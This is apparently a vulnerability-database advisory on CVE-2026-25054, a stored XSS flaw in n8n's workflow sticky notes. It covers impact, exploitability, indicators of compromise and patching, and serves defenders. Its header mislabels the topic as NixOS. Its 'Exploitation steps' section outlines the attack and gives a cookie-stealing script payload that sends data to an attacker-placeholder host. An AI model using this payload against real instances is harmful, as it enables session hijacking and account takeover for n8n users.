CVE-2026-25054: 
NixOS vulnerability analysis and mitigation

Overview

CVE-2026-25054 is a stored Cross-Site Scripting (XSS) vulnerability in n8n, an open-source workflow automation platform, affecting the markdown rendering component used in workflow sticky notes and other markdown-enabled UI areas. An authenticated user with workflow creation or modification permissions can inject malicious scripts that execute with same-origin privileges when other users interact with the crafted workflow. The vulnerability affects n8n versions prior to 1.123.9 (for the 1.x branch) and versions 2.0.0 through 2.2.0 (for the 2.x branch). It was published on February 4, 2026, with patches released the same day. The CVSS v4.0 base score is 8.5 (High); the CVSS v3.1 base score is 5.4 (Medium) (GitHub Advisory, n8n Security Advisory).

Technical details

The root cause is improper neutralization of script-related HTML tags in markdown content rendered within n8n's workflow UI (CWE-79, CWE-80). The markdown rendering component fails to sanitize or correctly escape user-supplied input — specifically HTML/script tags — before rendering it in the browser, allowing injected content to be interpreted as executable JavaScript. An attacker with low-level authenticated access (e.g., a regular user with workflow edit rights) can embed a malicious payload in a workflow sticky note or other markdown-supporting field; the payload executes in the context of any victim user who subsequently views or interacts with that workflow, operating under the same-origin policy of the n8n application. No public proof-of-concept exploit code has been identified at this time (GitHub Advisory, n8n Security Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user who views the maliciously crafted workflow, operating with the victim's same-origin privileges within the n8n application. This can lead to session token theft, account takeover, unauthorized access to sensitive workflow data and stored credentials, and potential lateral movement within the n8n environment by impersonating compromised accounts. Availability is not directly impacted, but confidentiality and integrity of user sessions and workflow data are at high risk (n8n Security Advisory, GitHub Advisory).

Exploitability

No public proof-of-concept exploit code has been identified, and there is no evidence of active in-the-wild exploitation at this time. The vulnerability requires the attacker to be an authenticated user with workflow creation or modification permissions, and exploitation also requires a victim user to interact with the malicious workflow (passive user interaction). The EPSS score is approximately 0.016% (4th percentile), indicating a low near-term exploitation probability. CVE-2026-25054 is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (GitHub Advisory, Feedly).

Exploitation steps

  1. Gain authenticated access: Obtain or use an existing n8n account with permissions to create or modify workflows on a vulnerable instance (version < 1.123.9 or 2.0.0–2.2.0).
  2. Craft a malicious workflow: Create or edit a workflow and insert an XSS payload into a markdown-supporting field such as a sticky note. Example payload: <script>fetch('https://attacker.example.com/steal?c='+document.cookie)</script> or using markdown image/link syntax to embed script-executing HTML.
  3. Persist the payload: Save the workflow so the malicious markdown content is stored server-side and rendered for all users who open the workflow.
  4. Trigger victim interaction: Share the workflow with or make it accessible to target users (e.g., administrators or other team members). When a victim opens or views the workflow in their browser, the injected script executes in their session context.
  5. Harvest session data: The script exfiltrates session tokens, cookies, or other sensitive data to an attacker-controlled endpoint, enabling session hijacking and account takeover (n8n Security Advisory, GitHub Advisory).

Indicators of compromise

  • Network: Unexpected outbound HTTP requests from users' browsers to external or unknown domains shortly after accessing n8n workflows; requests containing encoded session tokens or cookie values in query parameters or POST bodies.
  • Logs: n8n application or web server access logs showing workflow access events followed by unusual external requests; audit logs recording workflow edits by low-privileged users inserting raw HTML or <script> tags into sticky note or markdown fields.
  • File System / Application Data: Workflow definitions stored in the n8n database containing raw <script>, <img onerror=...>, or similar HTML injection patterns within markdown content fields.
  • User Behavior: Reports of unexpected logouts, session invalidations, or unauthorized actions performed under legitimate user accounts after viewing specific workflows.

Mitigation and workarounds

n8n has released patched versions 1.123.9 (for the 1.x branch) and 2.2.1 (for the 2.x branch); all users should upgrade immediately. As a temporary workaround if upgrading is not immediately feasible, administrators should restrict workflow creation and editing permissions to fully trusted users only, audit existing workflows for suspicious markdown content (especially raw HTML or script tags in sticky notes), and educate users about the risks of interacting with workflows from untrusted sources. These workarounds do not fully eliminate the risk and should only be used as short-term measures pending upgrade (n8n Security Advisory, GitHub Advisory).

Community reactions

The Belgium Centre for Cybersecurity (CCB) issued an advisory warning about multiple critical vulnerabilities in n8n, including CVE-2026-25054, recommending urgent patching (CCB Advisory). Field Effect and Endor Labs published blog posts covering the broader n8n vulnerability landscape around the same disclosure period, noting the significance of XSS and RCE risks in workflow automation platforms (Field Effect, Endor Labs). SentinelOne also catalogued the vulnerability in its vulnerability database. Community reaction has been moderate, with security researchers highlighting the risk of stored XSS in collaborative automation tools where workflows are shared across teams.

Additional resources


Source: This report was generated using AI

Related NixOS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-103678HIGH8.1
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103680MEDIUM6.5
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103679MEDIUM6.5
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103497MEDIUM5.5
  • YouTrack logoYouTrack
  • cpe:2.3:a:jetbrains:youtrack
NoYesOct 01, 2026
CVE-2026-103496MEDIUM5.4
  • YouTrack logoYouTrack
  • youtrack
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management